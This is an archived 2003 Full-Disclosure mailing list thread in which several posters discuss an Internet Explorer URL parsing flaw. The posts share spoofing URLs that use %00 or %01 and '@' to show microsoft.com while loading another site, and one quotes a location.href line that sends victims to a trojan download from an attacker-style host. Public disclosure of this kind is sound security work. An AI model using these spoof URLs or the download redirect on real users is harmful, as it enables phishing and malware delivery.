lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <28915501A44DBA4587FE1019D675F9830FC1CA@grfint.intern.adiscon.com>
From: rgerhards at hq.adiscon.com (Rainer Gerhards)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability

Well, 0x00 works even better (as usual). Consider the following URL:

http://www.microsoft.com:security%00@...w%77%2elinu%78%2eorg

This, together with a little social engineering can do much. In my IE
6.0.2800.1106.xpsp2.03422-1633 this takes your to www.linux.org, which
is also shown in the address bar. The status bar will show
"www.microsoft.com:security" whenever you hover over relative links on
the site (check with the news). The trick will most probably work will
with fake sites that remove the address bar.

The 0x00 C string terminator causes often quite some troubles. I
remember reporting a similar problem to Microsoft some month ago, then
related to %00 not being correctly parsed by IIS. It was considered low
risk by Microsoft and not immediately addressed (I have to admit I
actually think this at least not very high risk...). It should be
addressed by now.

Back to the dicsussed topic: I think it is also not very clever to
display credentials in the status bar. So if somebody is dumb enough to
actually use URLs with credentials, I think the browser should remove
them in all visible elements.

Rainer Gerhards
Adiscon






________________________________

	From: VeNoMouS [mailto:venom@...-x.co.nz] 
	Sent: Wednesday, December 10, 2003 6:03 AM
	To: Julian HO Thean Swee; full-disclosure@...ts.netsys.com
	Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL
parsing vulnerability
	
	
	umm tested this you dont need %01 either btw.
	 
	www.microsoft.com@....linux.org
	 
	was messing around with some hex stile as well is there a way to
call a file:// inside a http:// becos the issue with doing the @ trick
is it appends http:// automaticly, mind you , u could just make it exec
some vb code or something on a site, just a random idea any way
	 
	and it dont also seem to work if you use hex as well for the
full domain ie
	 
	www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67
	 
		nor  www.microsoft.com%40www.linux.org
	 
		where as if you
www.microsoft.com@...%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works
	 
	 
	 
	 
	 
	 
	----- Original Message ----- 

		From: Julian HO Thean Swee <mailto:jho@...rhub.com>  
		To: 'full-disclosure@...ts.netsys.com' 
		Sent: Wednesday, December 10, 2003 4:22 PM
		Subject: [Full-Disclosure] RE: FWD: Internet Explorer
URL parsing vulnerability


		Hmm, it doesn't seem to work on my browser :) 
		I don't even get transported to any page when i click
the button. 
		But then again, i have everything turned off in the
internet zone by default... 
		(but my submit non-encrypted form data is on) 

		Does it really work then?  it looks like it's using
javascript...? (location.href) 
		Merry Christmas everyone :) 

			--__--__-- 

			Message: 1 
			Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
			From: S G Masood <sgmasood@...oo.com> 
			To: full-disclosure@...ts.netsys.com 
			Subject: [Full-Disclosure] RE: FWD: Internet
Explorer URL parsing vulnerability 


			LOL. This is so simple and dangerous, it almost
made 
			me laugh and cry at the same time. Most of you
will 
			realise why...;D 
			The Paypal, AOL, Visa, Mastercard, et al email 
			scammers will have a harvest of gold this month
with 
			lots of zombies falling for this simple
technique. 

			># POC ########## 
	
>http://www.zapthedingbat.com/security/ex01/vun1.htm 

			Dont be surprised if your latest download from 
			http://www.microsoft.com turns out to be a
trojan! 

	
location.href=unescape('http://windowsupdate.microsoft.com%01@...edownlo
adaneviltrojanfromme.com); 


			-- 
			S.G.Masood 

			Hyderabad, 
			India 

			PS: One more thing - no scripting required to
exploit this. 

			__________________________________ 
			Do you Yahoo!? 
			Free Pop-Up Blocker - Get it now 
			http://companion.yahoo.com/ 


		This email is confidential and privileged.  If you are
not the intended recipient, you must not view, disseminate, use or copy
this email. Kindly notify the sender immediately, and delete this email
from your system. Thank you.

		Please visit our website at www.starhub.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ